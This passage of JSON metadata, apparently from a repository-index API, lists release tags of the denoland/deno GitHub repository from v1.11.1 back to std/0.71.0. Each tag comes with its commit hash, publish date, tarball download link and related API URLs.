,"download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/ho